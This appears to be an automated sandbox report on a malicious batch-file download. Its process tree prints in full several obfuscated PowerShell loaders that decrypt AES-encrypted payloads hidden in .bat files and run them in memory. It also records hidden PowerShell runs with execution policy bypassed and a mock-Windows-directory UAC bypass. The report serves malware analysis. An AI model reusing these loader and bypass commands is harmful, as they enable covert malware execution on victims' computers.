PID 4152 wrote to memory of 568 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 568 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 568 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 568 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 568 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 568 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 568 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 568 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 568 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 568 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 568 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 568 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 568 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 568 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 568 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 568 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 568 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4152 wrote to memory of 568 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://mega.nz/file/xrFlTTIK#PgctUxnTsOXbi92OS9LkJFrER2LAlLj9E5V-Cd-yNiY

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff84c203cb8,0x7ff84c203cc8,0x7ff84c203cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1904 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2764 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4692 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5368 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3888 /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x00000000000004D0 0x00000000000004D8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4028 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4756 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4756 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3364 /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\KLLauncher.bat" "

C:\Windows\system32\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JSdjfWSDJVO0vsFyBk+nB6C+eaYDe5c6Wed/quo44aM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nV7dP2kR9B3xk+WoLdi6HA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $eHWNi=New-Object System.IO.MemoryStream(,$param_var); $LEpVk=New-Object System.IO.MemoryStream; $YuKcK=New-Object System.IO.Compression.GZipStream($eHWNi, [IO.Compression.CompressionMode]::Decompress); $YuKcK.CopyTo($LEpVk); $YuKcK.Dispose(); $eHWNi.Dispose(); $LEpVk.Dispose(); $LEpVk.ToArray();}function execute_function($param_var,$param2_var){ $KsPcG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SLQNx=$KsPcG.EntryPoint; $SLQNx.Invoke($null, $param2_var);}$eXfZO = 'C:\Users\Admin\Downloads\KLLauncher.bat';$host.UI.RawUI.WindowTitle = $eXfZO;$bbfvj=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($eXfZO).Split([Environment]::NewLine);foreach ($aCusZ in $bbfvj) { if ($aCusZ.StartsWith('WzKRMLykmLUrjKyUnnlN')) { $ecFtX=$aCusZ.Substring(20); break; }}$payloads_var=[string[]]$ecFtX.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"

C:\Windows \System32\ComputerDefaults.exe

"C:\Windows \System32\ComputerDefaults.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c call SC.cmd

C:\Windows\system32\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JSdjfWSDJVO0vsFyBk+nB6C+eaYDe5c6Wed/quo44aM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nV7dP2kR9B3xk+WoLdi6HA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $eHWNi=New-Object System.IO.MemoryStream(,$param_var); $LEpVk=New-Object System.IO.MemoryStream; $YuKcK=New-Object System.IO.Compression.GZipStream($eHWNi, [IO.Compression.CompressionMode]::Decompress); $YuKcK.CopyTo($LEpVk); $YuKcK.Dispose(); $eHWNi.Dispose(); $LEpVk.Dispose(); $LEpVk.ToArray();}function execute_function($param_var,$param2_var){ $KsPcG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SLQNx=$KsPcG.EntryPoint; $SLQNx.Invoke($null, $param2_var);}$eXfZO = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $eXfZO;$bbfvj=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($eXfZO).Split([Environment]::NewLine);foreach ($aCusZ in $bbfvj) { if ($aCusZ.StartsWith('WzKRMLykmLUrjKyUnnlN')) { $ecFtX=$aCusZ.Substring(20); break; }}$payloads_var=[string[]]$ecFtX.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Crypt.bat" "

C:\Windows\system32\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Ready.bat" "

C:\Windows\system32\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7pfv3IC7ad/h9x9L+91yRp6AnehvA4v4FJcPUx3O2HY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X+cU4l/F7fG8+16o5SCDLA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $IlaQt=New-Object System.IO.MemoryStream(,$param_var); $Ybcnm=New-Object System.IO.MemoryStream; $Evfbh=New-Object System.IO.Compression.GZipStream($IlaQt, [IO.Compression.CompressionMode]::Decompress); $Evfbh.CopyTo($Ybcnm); $Evfbh.Dispose(); $IlaQt.Dispose(); $Ybcnm.Dispose(); $Ybcnm.ToArray();}function execute_function($param_var,$param2_var){ $QSfby=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TSQnj=$QSfby.EntryPoint; $TSQnj.Invoke($null, $param2_var);}$kvOlG = 'C:\Users\Admin\AppData\Local\Temp\Crypt.bat';$host.UI.RawUI.WindowTitle = $kvOlG;$pTJta=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($kvOlG).Split([Environment]::NewLine);foreach ($oFaKJ in $pTJta) { if ($oFaKJ.StartsWith('ZkqIwJCzcVBaEdxxLCQj')) { $xIiOP=$oFaKJ.Substring(20); break; }}$payloads_var=[string[]]$xIiOP.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('e8muxl44QzFpbnkCrjQK7MgY3wLigHlewOA/sTi7P3M='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xIHx7sG5Sgt6SDumHCsJWA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $anPTb=New-Object System.IO.MemoryStream(,$param_var); $dMvJM=New-Object System.IO.MemoryStream; $JXFgn=New-Object System.IO.Compression.GZipStream($anPTb, [IO.Compression.CompressionMode]::Decompress); $JXFgn.CopyTo($dMvJM); $JXFgn.Dispose(); $anPTb.Dispose(); $dMvJM.Dispose(); $dMvJM.ToArray();}function execute_function($param_var,$param2_var){ $GfJaX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $aDspK=$GfJaX.EntryPoint; $aDspK.Invoke($null, $param2_var);}$uyftC = 'C:\Users\Admin\AppData\Local\Temp\Ready.bat';$host.UI.RawUI.WindowTitle = $uyftC;$JWePL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($uyftC).Split([Environment]::NewLine);foreach ($ynrHu in $JWePL) { if ($ynrHu.StartsWith('hcYJWCkzLwgEbRimAuGK')) { $ygbIC=$ynrHu.Substring(20); break; }}$payloads_var=[string[]]$ygbIC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"

C:\Windows \System32\ComputerDefaults.exe

"C:\Windows \System32\ComputerDefaults.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c call SC.cmd

C:\Windows\system32\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7pfv3IC7ad/h9x9L+91yRp6AnehvA4v4FJcPUx3O2HY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X+cU4l/F7fG8+16o5SCDLA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $IlaQt=New-Object System.IO.MemoryStream(,$param_var); $Ybcnm=New-Object System.IO.MemoryStream; $Evfbh=New-Object System.IO.Compression.GZipStream($IlaQt, [IO.Compression.CompressionMode]::Decompress); $Evfbh.CopyTo($Ybcnm); $Evfbh.Dispose(); $IlaQt.Dispose(); $Ybcnm.Dispose(); $Ybcnm.ToArray();}function execute_function($param_var,$param2_var){ $QSfby=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TSQnj=$QSfby.EntryPoint; $TSQnj.Invoke($null, $param2_var);}$kvOlG = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $kvOlG;$pTJta=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($kvOlG).Split([Environment]::NewLine);foreach ($oFaKJ in $pTJta) { if ($oFaKJ.StartsWith('ZkqIwJCzcVBaEdxxLCQj')) { $xIiOP=$oFaKJ.Substring(20); break; }}$payloads_var=[string[]]$xIiOP.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Zero.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Lion.bat" "

C:\Windows\system32\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\system32\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZPwGCBOvjNusELqY76pxZya0Lxj9wUHStDWXWQq3VFQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ikdb8NRfiUQc/X8n0b8K3w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $husQJ=New-Object System.IO.MemoryStream(,$param_var); $fctrX=New-Object System.IO.MemoryStream; $IaCEh=New-Object System.IO.Compression.GZipStream($husQJ, [IO.Compression.CompressionMode]::Decompress); $IaCEh.CopyTo($fctrX); $IaCEh.Dispose(); $husQJ.Dispose(); $fctrX.Dispose(); $fctrX.ToArray();}function execute_function($param_var,$param2_var){ $cGlFM=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SXWwD=$cGlFM.EntryPoint; $SXWwD.Invoke($null, $param2_var);}$YwUMr = 'C:\Users\Admin\AppData\Local\Temp\Zero.bat';$host.UI.RawUI.WindowTitle = $YwUMr;$WBMie=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($YwUMr).Split([Environment]::NewLine);foreach ($yUchE in $WBMie) { if ($yUchE.StartsWith('eVpVeEttJiyVxTcVIRdA')) { $wGYAw=$yUchE.Substring(20); break; }}$payloads_var=[string[]]$wGYAw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1YnbLPNeUNVUVVxywIOo7MRePVU0zkaX0wmvOUU+5JI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('O1ZS4QT3iZbBumFZuklvIw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NszaK=New-Object System.IO.MemoryStream(,$param_var); $XeHtF=New-Object System.IO.MemoryStream; $IjqXl=New-Object System.IO.Compression.GZipStream($NszaK, [IO.Compression.CompressionMode]::Decompress); $IjqXl.CopyTo($XeHtF); $IjqXl.Dispose(); $NszaK.Dispose(); $XeHtF.Dispose(); $XeHtF.ToArray();}function execute_function($param_var,$param2_var){ $qIrXR=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TSbzU=$qIrXR.EntryPoint; $TSbzU.Invoke($null, $param2_var);}$DsdCu = 'C:\Users\Admin\AppData\Local\Temp\Lion.bat';$host.UI.RawUI.WindowTitle = $DsdCu;$ogPYs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($DsdCu).Split([Environment]::NewLine);foreach ($EVBrb in $ogPYs) { if ($EVBrb.StartsWith('amSrAwxpqNlmSpytGMiD')) { $WsuQP=$EVBrb.Substring(20); break; }}$payloads_var=[string[]]$WsuQP.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"

C:\Windows \System32\ComputerDefaults.exe

"C:\Windows \System32\ComputerDefaults.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c call SC.cmd

C:\Windows\system32\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Crypt.bat" "

C:\Windows\system32\cmd.exe

